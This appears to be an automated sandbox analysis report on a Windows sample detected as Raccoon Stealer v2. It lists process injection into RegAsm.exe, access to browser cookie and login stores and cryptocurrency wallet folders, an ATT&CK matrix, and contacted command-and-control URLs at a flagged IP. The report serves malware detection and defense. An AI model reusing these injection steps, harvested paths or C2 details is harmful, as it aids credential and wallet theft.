                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004103E1 OutputDebugStringA,SetEnvironmentVariableA,LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_004103E1
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E21F60 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF708E21F60
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001288000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm6
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeAPI call chain: ExitProcess graph end nodegraph_0-18714
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-4110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040DC49 SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,GetLastError,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalAlloc,lstrlenA,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,2_2_0040DC49
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF7090EBCE0 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00007FF7090EBCE0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E15170 RtlAddVectoredExceptionHandler,RaiseFailFastException,0_2_00007FF708E15170
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E71540 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF708E71540

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 411000Jump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 415000Jump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FD1008Jump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CF9A cpuid 2_2_0040CF9A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,2_2_0040CD2D
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E20B10 GetSystemTimeAsFileTime,0_2_00007FF708E20B10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F75C LocalAlloc,GetUserNameW,2_2_0040F75C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CE65 LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree,2_2_0040CE65
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Raccoon Stealer v2
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.60lAWJYfsL.exe.27e394bb140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1679665794.0000027E3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1679410416.0000027E39491000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 60lAWJYfsL.exe PID: 6828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5232, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
                    Source: RegAsm.exe, 00000002.00000002.2889674185.0000000001310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
                    Source: RegAsm.exe, 00000002.00000002.2890185933.000000000520C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\*
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance\*
                    Source: RegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\*d
                    Source: RegAsm.exe, 00000002.00000002.2890185933.000000000520C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live\*L
                    Source: RegAsm.exe, 00000002.00000002.2890185933.000000000520C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\prefs.jsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5232, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Raccoon Stealer v2
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.60lAWJYfsL.exe.27e394bb140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1679665794.0000027E3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1679410416.0000027E39491000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 60lAWJYfsL.exe PID: 6828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5232, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Screen Capture                    		2
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                    Process Injection                    		11
                    Virtualization/Sandbox Evasion                    		LSASS Memory111
                    Security Software Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		1
                    Access Token Manipulation                    		Security Account Manager11
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares3
                    Data from Local System                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                    Process Injection                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture112
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Account Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    System Owner/User Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Software Packing                    		DCSync2
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc Filesystem24
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    60lAWJYfsL.exe5%ReversingLabs
                    60lAWJYfsL.exe8%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\LocalLow\freebl3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\freebl3.dll0%VirustotalBrowse
                    C:\Users\user\AppData\LocalLow\mozglue.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\mozglue.dll3%VirustotalBrowse
                    C:\Users\user\AppData\LocalLow\msvcp140.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\msvcp140.dll0%VirustotalBrowse
                    C:\Users\user\AppData\LocalLow\nss3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\nss3.dll0%VirustotalBrowse
                    C:\Users\user\AppData\LocalLow\softokn3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\softokn3.dll0%VirustotalBrowse
                    C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\sqlite3.dll0%VirustotalBrowse
                    C:\Users\user\AppData\LocalLow\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\vcruntime140.dll0%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://aka.ms/nativeaot-compatibilit0%Avira URL Cloudsafe
                    http://95.169.205.186/100%Avira URL Cloudmalware
                    http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416100%Avira URL Cloudmalware
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416oaming100%Avira URL Cloudmalware
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://aka.ms/nativeaot-c0%Avira URL Cloudsafe
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%VirustotalBrowse
                    http://95.169.205.186/1%VirustotalBrowse
                    http://95.169.205.186:80/100%Avira URL Cloudmalware
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://aka.ms/nativeaot-compatibilityy0%Avira URL Cloudsafe
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416%100%Avira URL Cloudmalware
                    https://aka.ms/nativeaot-compatibilityy0%VirustotalBrowse
                    http://95.169.205.186:80/1%VirustotalBrowse
                    https://github.com/dotnet/runtime0%Avira URL Cloudsafe
                    https://aka.ms/nativeaot-c0%VirustotalBrowse
                    https://aka.ms/dotnet-warnings/0%Avira URL Cloudsafe
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e4166100%Avira URL Cloudmalware
                    https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
                    http://95.169.205.186/(100%Avira URL Cloudmalware
                    https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416N100%Avira URL Cloudmalware
                    https://aka.ms/dotnet-warnings/0%VirustotalBrowse
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416P100%Avira URL Cloudmalware
                    https://github.com/dotnet/runtime0%VirustotalBrowse
                    https://aka.ms/nativeaot-compatibilityHh0%Avira URL Cloudsafe
                    https://aka.ms/GlobalizationInvariantMode0%VirustotalBrowse
                    https://aka.ms/nativeaot-compatibility0%VirustotalBrowse
                    https://mozilla.org00%Avira URL Cloudsafe
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://95.169.205.186/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416true
                    • Avira URL Cloud: malware
                    		unknown
                    http://95.169.205.186:80/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabU24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.mozilla.com/en-US/blocklist/mozglue.dll.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/nativeaot-compatibilit60lAWJYfsL.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg576ZVk4VCTte.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoU24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416oamingRegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://aka.ms/nativeaot-c60lAWJYfsL.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/nativeaot-compatibilityy60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.576ZVk4VCTte.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta576ZVk4VCTte.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416%RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://github.com/dotnet/runtime60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/dotnet-warnings/60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg576ZVk4VCTte.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi576ZVk4VCTte.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://95.169.205.186/8895a7edf180661435c15d6dcaf4e4166RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://aka.ms/nativeaot-compatibility60lAWJYfsL.exe, 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchU24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/nativeaot-compatibilityY60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpfalse
                      		unknown
                      http://95.169.205.186/(RegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://aka.ms/GlobalizationInvariantMode60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
